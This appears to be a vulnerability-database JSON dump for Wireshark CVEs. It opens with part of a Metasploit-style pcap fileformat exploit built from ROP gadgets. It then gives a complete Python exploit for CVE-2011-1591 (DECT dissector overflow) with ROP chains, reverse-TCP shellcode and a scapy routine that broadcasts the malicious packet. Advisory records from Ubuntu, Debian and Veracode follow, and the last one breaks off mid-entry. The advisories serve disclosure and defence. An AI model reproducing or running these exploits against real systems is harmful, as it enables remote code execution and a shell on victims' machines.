MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x61c14552, # POP EBX # RETN ** [freetype6.dll] \n0x00000800, # size - 0x800 should be more than enough \n0x61c14043, # POP ESI # RETN ** [freetype6.dll] \n0x0000009C, \n0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] \njunk, \njunk, \n0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] \n0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] \n0x62d9027c, # \n0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] \n0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] \n0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] \n0x00000040, # \n0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] \n0x6536B010, # RW \n0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] \n0x618d7d0e, # RET \n0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] \n0x618d7d0e, # RET \n0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] \n].pack(\"V*\") \n \npivot = [target.ret].pack('V') \n \nbuffer = rand_text(131) \nbuffer << rop_pivot \nbuffer << rop_gadgets \n \nnops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) \n \nbuffer << nops \nbuffer << payload.encoded \nbuffer << pivot \n \nfiller = 1500 - buffer.length \n \nbuffer << rand_text(filler) \n \nfilecontent = global_header \nfilecontent << packet_header \nfilecontent << ptype \nfilecontent << buffer \n \nprint_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\") \n \nfile_create(filecontent) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/109341/windows-fileformat-wireshark_packet_dect.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:14:47", "description": "", "cvss3": {}, "published": "2011-11-23T00:00:00", "type": "packetstorm", "title": "Wireshark 1.4.4 DECT Dissector Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2011-11-23T00:00:00", "id": "PACKETSTORM:107229", "href": "https://packetstormsecurity.com/files/107229/Wireshark-1.4.4-DECT-Dissector-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n# -*- coding: iso-8859-15 -*- \n \na = \"\"\" \n\\n\\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\\n \n# \n# -------- Team : Consortium-of-Pwners \n# -------- Author : ipv \n# -------- Impact : high \n# -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz \n# -------- Description \n# \n# This code exploits a remote stack based buffer overflow in the DECT dissector of \n# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to \n# shellcode located the payload. \n# All the process is automated, and bypass any NX/ALSR. \n# \n# Operating Systems tested : [see the summary] with scapy >= 2.5 \n# For any comments, remarks, news, please mail me : ipv _at_ [team] . net \n###########################################################################\\n\"\"\" \n \n \nimport sys, struct \nif sys.version_info >= (2, 5): \nfrom scapy.all import * \nelse: \nfrom scapy import * \n \n# align \ndef _x(v): \nreturn struct.pack(\"<I\", v) \n \n# Gadget Table - Arch linux v2010.05 default package \n# - wireshark-cli-1.4.3-1-i686.pkg.tar.xz \n# - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz \narch_rop_chain = [ \n \n# Safe SEIP overwrite \n_x(0x8069acb), # pop ebx ; pop esi ; pop ebp \n_x(0), _x(0x80e9360), _x(0), # fake (arg1, arg2, arg3), to avoid crash \n \n# mprotect 1st arg : stack & 0xffff0000 \n_x(0x8067d90), # push esp ; pop ebp \n_x(0x8081f2e), # xchg ebp eax \n_x(0x80f9d7f), # xchg ecx, eax \n_x(0x8061804), # pop eax \n_x(0xffff0000), # \n_x(0x80c69f0), # xchg edi, eax \n_x(0x80ff067), # and ecx edi ; dec ecx \n_x(0x8077c53), # inc ecx ; sub al 0x5d \n_x(0x8061804), # pop eax \n_x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c] \n_x(0x8048360), # xchg ecx eax \n_x(0x8089f46), # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] \n_x(0x8067d90), # push esp ; pop ebp \n_x(0x8081f2e), # xchg ebp eax \n_x(0x8067d92)*7, # ret \n# 1st arg of mprotect is on esp+48 address (see below) \n_x(0x80745f9), # mov [eax+0x50] edx ; pop ebp \n_x(0), \n \n# we search address of mprotect (@mprotect = @fopen + 0x6fe70) \n_x(0x8065226), # pop eax \n_x(0x81aca20-0xc), # got[fopen] \n_x(0x8074597), # mov eax [eax+0xc] \n_x(0x8048360), # xchg ecx eax \n_x(0x8065226), # pop eax \n_x(0x6fe70), \n_x(0x8081f2e), # xchg ebp eax \n_x(0x806973d), # add ecx ebp \n_x(0x08104f61), # jmp *%ecx \n_x(0x0811eb63), # pop ebx, pop esi, pop edi \n# mprotect args (base_addr, page size, mode) \n_x(0), # Stack Map that is updated dynamically (see upper) \n_x(0x10000), # PAGE size 0x1000 \n_x(0x7), # RWX Mode \n \n# now we can jump to our lower addressed shellcode by decreasing esp register \n_x(0x8061804), # pop eax \n_x(0xff+0x50), # esp will be decreased of 0xff + 0x50 bytes; \n_x(0x80b8fc8), # xchg edi eax \n_x(0x8067d90), # push esp ; pop ebp \n_x(0x80acc63), # sub ebp, edi ; dec ecx \n_x(0x8081f2e), # xchg ebp eax \n_x(0x0806979e) # jmp *eax \n] \n \n# Gadget Table - Bt4 compiled without SSP/FortifySource \n# Source wireshark 1.4.3 \nlabs_rop_chain = [ \n \n# Safe SEIP overwrite \n_x(0x08073fa1), # pop ebx ; pop esi ; pop ebp \n_x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash \n \n# sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode \n# mprotect 3r d arg \n_x(0x080e64cf), # pop edx ; pop es ; add cl cl \n_x(0x7), _x(0x0), # RWX mode 0x7 \n \n# mprotect 1st arg (logical AND with stack address to get address base), \n_x(0x080a1711), # mov edi esp ; dec ecx \n_x(0x0815b74f), # pop ecx \n_x(0xffff0000), # \n_x(0x0804c73c), # xchg ecx eax \n_x(0x080fadd7), # and edi eax ; dec ecx \n_x(0x0804c73c), # xchg ecx eax \n_x(0x080af344), # mov ebx edi ; dec ecx \n \n# mprotect 2nd arg \n_x(0x0815b74f), # pop ecx \n_x(0x10000), # PAGE size 0x10000 \n \n# int 0x80 : here vdso is not randomized, so, we use it! \n_x(0x80d8b71), # pop eax \n_x(0x7D), # 0x7D = mprotect syscall \n_x(0x804e6df), # pop *esi \n_x(0xffffe411), # int 0x80 \n \n# _x(0xffffe414), # @sysenter in .vdso \n_x(0x080ab949), # jmp *esi \n \n# now we can jump to our lower addressed shellcode by decreasing esp register \n_x(0x0815b74f), # pop ecx \n_x(256), # esp will be decreased of 256bytes \n_x(0x080a1711), # mov edi esp ; dec ecx \n_x(0x081087d3), # sub edi ecx ; dec ecx \n_x(0x080f7cb1) # jmp *edi \n] \n \naddr_os = { \n# ID # OS # STACK SIZE # GADGET TABLE \n1 : [\"Arch Linux 2010.05 \", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz \n2 : [\"Labs test \", 0xbf, labs_rop_chain], \n-1 : [\"Debian 5.0.8 Lenny \", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb \n-2 : [\"Debian 6.0.2 Squeeze \", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb \n-3 : [\"Fedora 14 \", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm \n-4 : [\"OpenSuse 11.3 \", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm \n-5 : [\"Ubuntu 10.10 | 11.04 \", -1, False], # \n-6 : [\"Gentoo * \", -2, False] # \n} \n \nprint a \n \ndef usage(): \nprint \"Please select and ID >= 0 :\\n\" \nprint \" ID TARGET INFO\" \nprint \"--------------------------------------------------------------------\" \nfor i in addr_os.iteritems(): \nprint \" %2d -- %s \"%(i[0], i[1][0]), \nif i[1][1] == -1: \nprint \"Default package uses LibSSP & Fortify Source\" \nelif i[1][1] == -2: \nprint \"Compiled/Build with Fortify Source\" \nelif i[1][1] == -3: \nprint \"DECT protocol not supported\" \nelse: \nprint \"VULN -> Stack size %d\"%(i[1][1]) \n \nsys.exit(1) \n \nif len(sys.argv) == 1: \nusage() \nelif addr_os.has_key(int(sys.argv[1])) is False: \nusage() \nelif int(sys.argv[1]) < 0: \nusage() \n \ntarget = addr_os[int(sys.argv[1])] \nprint \"\\n[+] Target : %s\"%target[0] \n \nrop_chain = \"\".join([ rop for rop in target[2]]) \n \n# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C \nrev_tcp_shell = \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x5b\\x5e\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x11\\x5c\\x66\\x53\\x6a\\x10\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"; \n \n \nSEIP_SMASH = target[1] \nprint \"\\t[+] Length for smashing SEIP : 0x%x(%d)\"%(SEIP_SMASH, SEIP_SMASH) \n \nnopsled = \"\\x90\" \nhead_nop = 50 \nshellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop) \npayload = shellcode + rop_chain \n# stack alignment \nif (len(payload) % 2): \ndiff = len(payload) % 2 \npayload = payload[(2-diff):] \n \nprint \"\\t[+] Payload length : %d\"%len(payload) \n \nevil_packet = Ether(type=0x2323, dst=\"ff:ff:ff:ff:ff:ff\") / payload \n# evil_packet.show() \n \nprint \"\\t[+] Evil packet length : %d\"%len(evil_packet) \n \nprint \"\\t[+] Sending packet to broadcast\" \nsendp(evil_packet) \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/107229/wireshark144-overflow.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:33:48", "description": "Stack-based buffer overflow in the DECT dissector in\nepan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote\nattackers to execute arbitrary code via a crafted .pcap file.\n\n#### Bugs\n\n * <https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838>\n * <https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836>\n", "cvss3": {}, "published": "2011-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2011-1591", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-04-29T00:00:00", "id": "UB:CVE-2011-1591", "href": "https://ubuntu.com/security/CVE-2011-1591", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:52", "description": "The SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0 through\n1.2.8 allows remote attackers to cause a denial of service (NULL pointer\ndereference) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2283", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283"], "modified": "2010-06-15T00:00:00", "id": "UB:CVE-2010-2283", "href": "https://ubuntu.com/security/CVE-2010-2283", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:36:52", "description": "The SigComp Universal Decompressor Virtual Machine dissector in Wireshark\n0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to\ncause a denial of service (infinite loop) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2286", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2286"], "modified": "2010-06-15T00:00:00", "id": "UB:CVE-2010-2286", "href": "https://ubuntu.com/security/CVE-2010-2286", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:33:47", "description": "The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before\n1.4.5 does not properly initialize certain global variables, which allows\nremote attackers to cause a denial of service (application crash) via a\ncrafted .pcap file.\n\n#### Bugs\n\n * <https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5793>\n * <https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5754>\n", "cvss3": {}, "published": "2011-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2011-1590", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590"], "modified": "2011-04-29T00:00:00", "id": "UB:CVE-2011-1590", "href": "https://ubuntu.com/security/CVE-2011-1590", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:36:52", "description": "Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through\n1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack\nvectors.", "cvss3": {}, "published": "2010-06-15T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2284", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284"], "modified": "2010-06-15T00:00:00", "id": "UB:CVE-2010-2284", "href": "https://ubuntu.com/security/CVE-2010-2284", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:52", "description": "Buffer overflow in the SigComp Universal Decompressor Virtual Machine\ndissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has\nunknown impact and remote attack vectors.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/wireshark/+bug/730419>\n * <https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=4826>\n", "cvss3": {}, "published": "2010-06-15T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2287", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2010-06-15T00:00:00", "id": "UB:CVE-2010-2287", "href": "https://ubuntu.com/security/CVE-2010-2287", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:22", "description": "Stack-based buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13\nthrough 1.0.14 and 1.2.0 through 1.2.9 has unknown impact and remote attack\nvectors. NOTE: this issue exists because of a CVE-2010-2284 regression.", "cvss3": {}, "published": "2010-08-13T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2994", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284", "CVE-2010-2994"], "modified": "2010-08-13T00:00:00", "id": "UB:CVE-2010-2994", "href": "https://ubuntu.com/security/CVE-2010-2994", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:20", "description": "The SigComp Universal Decompressor Virtual Machine (UDVM) in Wireshark\n0.10.8 through 1.0.14 and 1.2.0 through 1.2.9 allows remote attackers to\ncause a denial of service (crash) and possibly execute arbitrary code via\nvectors related to sigcomp-udvm.c and an off-by-one error, which triggers a\nbuffer overflow, different vulnerabilities than CVE-2010-2287.", "cvss3": {}, "published": "2010-08-13T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2995", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287", "CVE-2010-2995"], "modified": "2010-08-13T00:00:00", "id": "UB:CVE-2010-2995", "href": "https://ubuntu.com/security/CVE-2010-2995", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-31T06:02:27", "description": "Stack-based buffer overflow in the DECT dissector in epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote attackers to execute arbitrary code via a crafted .pcap file.", "cvss3": {}, "published": "2011-04-29T22:55:00", "type": "debiancve", "title": "CVE-2011-1591", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-04-29T22:55:00", "id": "DEBIANCVE:CVE-2011-1591", "href": "https://security-tracker.debian.org/tracker/CVE-2011-1591", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T06:02:26", "description": "The SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "debiancve", "title": "CVE-2010-2283", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283"], "modified": "2010-06-15T14:04:00", "id": "DEBIANCVE:CVE-2010-2283", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2283", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-31T06:02:26", "description": "The SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "debiancve", "title": "CVE-2010-2286", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2286"], "modified": "2010-06-15T14:04:00", "id": "DEBIANCVE:CVE-2010-2286", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2286", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-31T06:02:27", "description": "The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file.", "cvss3": {}, "published": "2011-04-29T22:55:00", "type": "debiancve", "title": "CVE-2011-1590", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590"], "modified": "2011-04-29T22:55:00", "id": "DEBIANCVE:CVE-2011-1590", "href": "https://security-tracker.debian.org/tracker/CVE-2011-1590", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-31T06:02:26", "description": "Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "debiancve", "title": "CVE-2010-2284", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284"], "modified": "2010-06-15T14:04:00", "id": "DEBIANCVE:CVE-2010-2284", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2284", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T06:02:26", "description": "Buffer overflow in the SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "debiancve", "title": "CVE-2010-2287", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2010-06-15T14:04:00", "id": "DEBIANCVE:CVE-2010-2287", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2287", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T06:02:26", "description": "Stack-based buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.14 and 1.2.0 through 1.2.9 has unknown impact and remote attack vectors. NOTE: this issue exists because of a CVE-2010-2284 regression.", "cvss3": {}, "published": "2010-08-13T18:43:00", "type": "debiancve", "title": "CVE-2010-2994", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284", "CVE-2010-2994"], "modified": "2010-08-13T18:43:00", "id": "DEBIANCVE:CVE-2010-2994", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2994", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T06:02:26", "description": "The SigComp Universal Decompressor Virtual Machine (UDVM) in Wireshark 0.10.8 through 1.0.14 and 1.2.0 through 1.2.9 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to sigcomp-udvm.c and an off-by-one error, which triggers a buffer overflow, different vulnerabilities than CVE-2010-2287.", "cvss3": {}, "published": "2010-08-13T18:43:00", "type": "debiancve", "title": "CVE-2010-2995", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287", "CVE-2010-2995"], "modified": "2010-08-13T18:43:00", "id": "DEBIANCVE:CVE-2010-2995", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2995", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-27T10:57:08", "description": "wireshark is vulnerable to denial of service (DoS). The vulnerability exists as several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or 